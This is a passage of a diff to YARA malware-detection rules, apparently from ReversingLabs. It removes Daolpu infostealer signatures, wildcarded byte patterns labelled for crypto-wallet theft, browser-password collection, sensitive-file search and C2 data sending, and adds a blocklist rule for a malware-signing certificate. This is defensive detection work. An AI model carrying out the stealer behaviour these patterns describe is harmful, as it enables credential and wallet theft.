?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? - B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ?? - ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0 - 66 89 45 ?? 8D 4D ?? 51 6A ?? 8D 95 ?? ?? ?? ?? 52 0F B7 45 ?? 50 8B 4D ?? 51 8B 55 - ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 - ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 - } - $find_crypto_wallets_2 = { - 0D ?? ?? ?? ?? 80 C1 ?? 88 0D ?? ?? ?? ?? 83 7D ?? ?? 76 ?? 8A 15 ?? ?? ?? ?? 80 C2 - ?? 88 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? - ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 3D ?? - ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? - ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? - B8 ?? ?? ?? ?? C1 E0 ?? 8B 4D ?? 0F B6 14 01 83 FA ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? - ?? 6B C8 ?? 8B 55 ?? 0F B6 04 0A 83 F8 ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B D1 ?? - 8B 45 ?? 0F B6 0C 10 83 F9 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 6B C2 ?? 8B 4D ?? 0F - B6 14 01 83 FA ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? - ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 - ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? - B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA - } - condition: - uint16(0)==0x5A4D and ( all of ($collect_os_information_p*)) and ( all of ($send_data_to_c2_p*)) and ( all of ($find_files_p*)) and ( all of ($find_crypto_wallets_*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Arctic Nights \\xC3\\x84k\\xC3\\xA4slompolo Oy" and (pe.signatures[i].serial=="00:98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2" or pe.signatures[i].serial=="98:4e:84:cf:e3:62:e2:78:f5:58:e2:c7:0a:aa:fa:c2") and 1640304000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win64_Infostealer_Daolpu : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Ff52Eb011Bb748Fee75153Cbe1E50Dd6 : INFO FILE { meta: - description = "Yara rule that detects Daolpu infostealer." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bf815556-6ccf-506a-b858-5f4c18282c05" - date = "2024-08-26" - modified = "2024-08-26" + id = "acd29c6d-27ed-587a-b17c-989e69082434" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/infostealer/Win64.Infostealer.Daolpu.yara#L1-L322" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5ffd0427c6c8e666cfabc48426e7771595a7024548706f37a1de3538e4e2d559" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11764-L11782" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8c80ed4e4f77df34ff9fcc712deda4c1bbedc588f2b01d02aa705e368fb98c5e" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Infostealer" - tc_detection_name = "Daolpu" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $network_communication = { - 48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 7C 24 ?? 41 56 48 83 EC ?? 48 8B D9 49 8B E8 B9 - ?? ?? ?? ?? 4C 8B F2 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? - ?? 4C 8D 05 ?? ?? ?? ?? 48 89 74 24 ?? BA ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 83 - 7B ?? ?? 4C 8D 43 ?? 76 ?? 4D 8B 00 BA ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? BA ?? ?? - ?? ?? 48 8B CF 44 8D 42 ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B - CF E8 ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B CF E8 ?? ?? - ?? ?? 48 8B C8 48 8B F0 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? - ?? ?? ?? 49 83 7E ?? ?? 49 8D 56 ?? 76 ?? 48 8B 12 48 8B CB E8 ?? ?? ?? ?? 48 8B CE - E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 48 83 7D ?? ?? - 48 8D 55 ?? 76 ?? 48 8B 12 49 C7 C0 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B CE E8 - ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? - ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 4C 8B C6 BA ?? ?? ?? ?? 48 8B CF E8 - ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 8B E8 85 C0 75 ?? 48 8D 1D ?? ?? ?? ?? 48 8D 05 - ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CD 48 - 8B D8 E8 ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B - CE E8 ?? ?? ?? ?? 48 8B 74 24 ?? 48 8B CF E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24 - ?? 33 C0 48 8B 6C 24 ?? 48 8B 7C 24 ?? 48 83 C4 ?? 41 5E C3 - } - $find_sensitive_files_p1 = { - 48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? - ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 4C 8B F2 48 8B F9 45 33 - E4 4C 89 65 ?? 0F 57 C0 0F 11 45 ?? 0F 57 C9 F3 0F 7F 4D ?? 49 C7 C0 ?? ?? ?? ?? 49 - FF C0 66 46 39 24 41 75 ?? 48 8B D7 48 8D 4D ?? E8 ?? ?? ?? ?? 90 41 B8 ?? ?? ?? ?? - 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 47 - 4D ?? 48 8D 55 ?? FF 15 ?? ?? ?? ?? 4C 8B F8 0F 57 C0 F3 0F 7F 45 ?? 0F 57 C9 F3 0F - 7F 4D ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 60 ?? 48 89 45 ?? 48 8D 4D ?? 48 89 08 - 49 83 FF ?? 0F 84 ?? ?? ?? ?? 4C 8D 2D ?? ?? ?? ?? F6 45 ?? ?? 0F 84 ?? ?? ?? ?? 0F - B7 4D ?? 0F B7 45 ?? 66 83 F9 ?? 75 ?? 66 85 C0 0F 84 ?? ?? ?? ?? 66 3B C9 75 ?? 66 - 3B C1 75 ?? 66 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 4C 89 64 24 ?? 0F 57 C0 0F 11 44 24 ?? - 4C 89 65 ?? 4C 89 65 ?? 49 C7 C0 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 49 FF C0 66 - 42 83 3C 47 ?? 75 ?? 48 8B D7 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 41 B8 ?? ?? ?? ?? 48 - 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 0F - 1F 44 00 ?? 49 FF C0 66 42 83 3C 40 ?? 75 ?? 48 8D 55 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? - ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 49 8B D6 E8 ?? ?? ?? ?? 90 48 8D - 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 48 8B 54 24 ?? 48 8D 4C 24 ?? - E8 ?? ?? ?? ?? 4C 89 65 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 64 24 ?? 48 8B 4C 24 ?? - 4C 89 64 24 ?? E9 ?? ?? ?? ?? 4C 89 65 ?? 0F 57 C0 0F 11 45 ?? 4C 89 65 ?? 4C 89 65 - ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 66 42 83 3C 40 ?? 75 ?? 48 8D 55 ?? 48 - } - $find_sensitive_files_p2 = { - 8D 4D ?? E8 ?? ?? ?? ?? 90 4C 8D 55 ?? 48 8B 5D ?? 48 8B 75 ?? 48 83 FE ?? 4C 0F 47 - D3 4C 8B 5D ?? 49 83 FB ?? 72 ?? 49 8D 4B ?? 48 C7 C0 ?? ?? ?? ?? 48 3B C8 48 0F 42 - C1 4D 8D 0C 42 4D 8B C1 4D 2B C5 66 41 83 39 ?? 75 ?? BA ?? ?? ?? ?? 49 8B C5 42 0F - B7 0C 00 66 3B 08 75 ?? 48 83 C0 ?? 48 83 EA ?? 75 ?? 4D 2B CA 49 D1 F9 EB ?? 4D 3B - CA 74 ?? 49 83 E9 ?? 49 83 E8 ?? EB ?? 49 C7 C1 ?? ?? ?? ?? 49 83 F9 ?? 0F 84 ?? ?? - ?? ?? 49 FF C1 4C 89 64 24 ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 65 ?? 4C 89 65 ?? 4D 3B - D9 0F 82 ?? ?? ?? ?? 4D 2B D9 49 C7 C0 ?? ?? ?? ?? 4D 3B D8 4D 0F 42 C3 48 8D 45 ?? - 48 83 FE ?? 48 0F 47 C3 4A 8D 14 48 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? - 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? - ?? ?? ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 - 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 7D ?? - ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 - 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 - C0 74 ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 85 C0 74 ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 - 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 4C 89 64 24 ?? 0F 57 C0 0F - 11 44 24 ?? 4C 89 64 24 ?? 4C 89 64 24 ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 66 42 83 3C - } - $find_sensitive_files_p3 = { - 47 ?? 75 ?? 48 8B D7 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 41 B8 ?? ?? ?? ?? 48 8D 15 ?? - ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 - 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? 4C 8B 45 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 - 8B D0 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 49 - 83 F8 ?? 76 ?? 48 8B 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 89 64 24 ?? 48 C7 44 - 24 ?? ?? ?? ?? ?? 66 44 89 64 24 ?? 48 8B 4C 24 ?? 4C 89 64 24 ?? BA ?? ?? ?? ?? E8 - ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 49 83 F8 ?? 76 ?? 48 8B - 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 89 64 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 - 44 89 64 24 ?? 48 8B 4C 24 ?? 4C 89 64 24 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 49 8B 46 - ?? 49 3B 46 ?? 74 ?? 48 8D 55 ?? 48 8B C8 E8 ?? ?? ?? ?? 49 8B 5E ?? BA ?? ?? ?? ?? - 48 8D 4D ?? E8 ?? ?? ?? ?? 49 8B 0E 48 83 C1 ?? 48 8B 01 48 85 C0 74 ?? 48 39 58 ?? - 72 ?? 77 ?? 4C 89 20 48 8B 40 ?? 48 89 01 EB ?? 48 8D 48 ?? 48 8B 01 48 85 C0 75 ?? - 48 8D 4D ?? E8 ?? ?? ?? ?? 49 83 46 ?? ?? EB ?? 4C 8D 45 ?? 48 8B D0 49 8B CE E8 ?? - ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 48 8B 55 ?? 48 - 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 65 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 65 ?? 48 8B 4D - ?? 4C 89 65 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B - 45 ?? 49 83 F8 ?? 76 ?? 48 8B 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 89 65 ?? 48 - C7 45 ?? ?? ?? ?? ?? 66 44 89 64 24 ?? 48 8B 4C 24 ?? 4C 89 64 24 ?? BA ?? ?? ?? ?? - E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 48 8B 55 - ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 65 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 65 ?? 48 - } - $parse_firefox_configuration_p1 = { - 48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 41 54 41 55 41 56 41 57 48 8D AC 24 - ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? - 48 8B F1 48 89 4C 24 ?? 45 33 ED 44 89 6C 24 ?? 0F 57 C0 0F 11 01 0F 11 41 ?? 4C 89 - 29 4C 89 69 ?? 4C 89 69 ?? 4C 89 69 ?? 41 8D 4D ?? E8 ?? ?? ?? ?? 4C 89 68 ?? 48 89 - 06 48 89 30 C7 44 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? - ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 4C 8B 75 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 49 2B C6 - 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 4C 8D 65 ?? 48 83 7D ?? ?? 4C 0F 47 65 ?? 4C 89 6C 24 - ?? 0F 57 C0 0F 11 44 24 ?? 0F 57 C9 F3 0F 7F 4C 24 ?? 4D 8D 7E ?? 41 8D 5D ?? 48 8D - 7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? - ?? ?? 48 8D 4C 24 ?? 48 89 08 4C 89 68 ?? 48 89 44 24 ?? 8D 4B ?? 4C 3B FB 76 ?? 49 - 8B DF 48 83 CB ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 3B D8 76 ?? 48 8B D8 EB ?? 48 3B - D9 48 0F 42 D9 48 8D 4B ?? E8 ?? ?? ?? ?? 48 8B F8 48 89 44 24 ?? 4C 89 7C 24 ?? 48 - 89 5C 24 ?? 4D 8B C6 49 8B D4 48 8B CF E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 66 42 89 04 - 37 0F B6 05 ?? ?? ?? ?? 42 88 44 37 ?? 42 C6 04 3F ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D - 54 24 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? - 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 66 0F 6F 05 - ?? ?? 12 00 F3 0F 7F 44 24 ?? C6 44 24 ?? ?? 48 8B 4C 24 ?? 4C 89 6C 24 ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 0F 57 C0 0F 11 45 ?? - 0F 11 45 ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? ?? ?? 90 - } - $parse_firefox_configuration_p2 = { - 4C 89 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 6C 24 ?? 4C 89 6C 24 ?? 48 8B 7D ?? 4C - 8D 75 ?? 48 83 7D ?? ?? 4C 0F 47 75 ?? 49 BC ?? ?? ?? ?? ?? ?? ?? ?? 49 3B FC 0F 87 - ?? ?? ?? ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 - 85 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 89 08 4C 89 68 ?? 48 89 44 24 ?? 48 83 FF ?? 77 ?? - 48 89 7C 24 ?? BA ?? ?? ?? ?? 48 89 54 24 ?? 41 0F 10 06 0F 11 44 24 ?? EB ?? 48 8B - DF 48 83 CB ?? 49 3B DC 76 ?? 49 8B DC EB ?? 48 83 FB ?? B8 ?? ?? ?? ?? 48 0F 42 D8 - 48 8D 4B ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 7C 24 ?? 48 89 5C 24 ?? 4C 8D 47 ?? - 49 8B D6 48 8B C8 E8 ?? ?? ?? ?? 90 48 8B 54 24 ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 - 85 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 FA ?? 48 - 0F 47 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 - 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 4C 24 - ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 49 83 F8 ?? 76 ?? 49 FF C0 48 8B 54 24 ?? 48 8D 4C - 24 ?? E8 ?? ?? ?? ?? 4C 89 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 48 8B - 4C 24 ?? 4C 89 6C 24 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 DB 75 ?? 48 8D 15 ?? ?? - ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? - ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 - ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 - 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? - ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF - 15 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB FF 15 - } - $parse_firefox_configuration_p3 = { - 4C 8B 7D ?? 49 8B C4 49 2B C7 48 83 F8 ?? 0F 82 ?? ?? ?? ?? 4C 8D 65 ?? 48 83 7D ?? - ?? 4C 0F 47 65 ?? 4C 89 6C 24 ?? 0F 57 C0 0F 11 44 24 ?? 0F 57 C9 F3 0F 7F 4D ?? 4D - 8D 77 ?? BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 8D 44 24 ?? 48 89 85 ?? ?? ?? ?? 8D 4B ?? - E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 89 08 4C 89 68 ?? 48 89 44 24 - ?? 4C 3B F3 76 ?? 49 8B DE 48 83 CB ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 3B D8 76 ?? - 48 8B D8 EB ?? 48 83 FB ?? B8 ?? ?? ?? ?? 48 0F 42 D8 48 8D 4B ?? E8 ?? ?? ?? ?? 48 - 8B F8 48 89 44 24 ?? 4C 89 75 ?? 48 89 5D ?? 4D 8B C7 49 8B D4 48 8B CF E8 ?? ?? ?? - ?? 42 C7 04 3F ?? ?? ?? ?? 42 C6 04 37 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8B 05 ?? ?? ?? - ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? FF D0 4C 8B 75 ?? 48 8B 5D ?? 49 - 3B DE 0F 84 ?? ?? ?? ?? 48 83 C3 ?? 0F 1F 40 ?? 48 8D 43 ?? 48 8D 4D ?? 48 3B C8 74 - ?? 48 8B D3 48 83 7B ?? ?? 76 ?? 48 8B 13 4C 8B 43 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 - 8D 53 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? - ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 40 ?? 49 FF C0 42 80 3C 00 ?? 75 ?? 48 8B D0 48 8D 4D - ?? E8 ?? ?? ?? ?? 48 8D 53 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? - 48 8B C8 E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 0F 1F 44 00 ?? 49 FF C0 42 80 3C 00 ?? - 75 ?? 48 8B D0 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 7E ?? 48 3B 7E ?? 74 ?? 48 - 89 BD ?? ?? ?? ?? 48 8D 55 ?? 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 4F ?? 48 8D 55 ?? E8 - ?? ?? ?? ?? 90 48 8D 4F ?? 48 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 56 ?? 4C 8B - C2 48 8B CE E8 ?? ?? ?? ?? 48 83 46 ?? ?? EB ?? 4C 8D 45 ?? 48 8B D7 48 8B CE E8 ?? - ?? ?? ?? 48 83 C3 ?? 48 8D 43 ?? 49 3B C6 0F 85 ?? ?? ?? ?? 48 8D 4C 24 - } - $collect_browser_passwords_p1 = { - 48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? - ?? ?? ?? 0F 29 B4 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? - 48 63 DA 48 8B F9 48 89 4D ?? C7 44 24 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 01 0F 11 41 ?? - 45 33 ED 4C 89 29 4C 89 69 ?? 4C 89 69 ?? 4C 89 69 ?? 41 8D 4D ?? E8 ?? ?? ?? ?? 4C - 89 68 ?? 48 89 07 48 89 38 C7 44 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 - 8D 0C 9B 4C 8D 05 ?? ?? ?? ?? 49 8D 50 ?? 48 8D 14 CA 49 83 7C C8 ?? ?? 76 ?? 48 8B - 12 4D 8B 44 C8 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8D 4D ?? E8 ?? ?? ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 49 FF C0 - 48 8B 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 12 00 F3 0F 7F 45 ?? C6 45 - ?? ?? 48 8B 4D ?? 4C 89 6D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4D ?? E8 ?? ?? - ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 8B CB E8 ?? - ?? ?? ?? 4C 8B E0 4C 89 6D ?? 4C 89 6D ?? 0F 57 C0 0F 11 45 ?? 0F 57 C9 F3 0F 7F 4D - ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 4C 89 6D ?? - 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 47 4D ?? 48 8D 55 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? - 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D8 48 8B 4D ?? FF 15 - ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? - 48 8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? 4C 89 6C 24 ?? 4C 8D 4D ?? 41 B8 ?? ?? ?? - ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8B 4D ?? - FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 33 D2 48 8B - 4D ?? FF 15 ?? ?? ?? ?? 4C 8B F8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B - } - $collect_browser_passwords_p2 = { - F0 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 4C 8B F0 BA ?? ?? ?? ?? 48 8B 4D ?? - FF 15 ?? ?? ?? ?? 48 8B D8 BA ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? BA ?? ?? ?? - ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 C7 C0 ?? ?? ?? ?? - 48 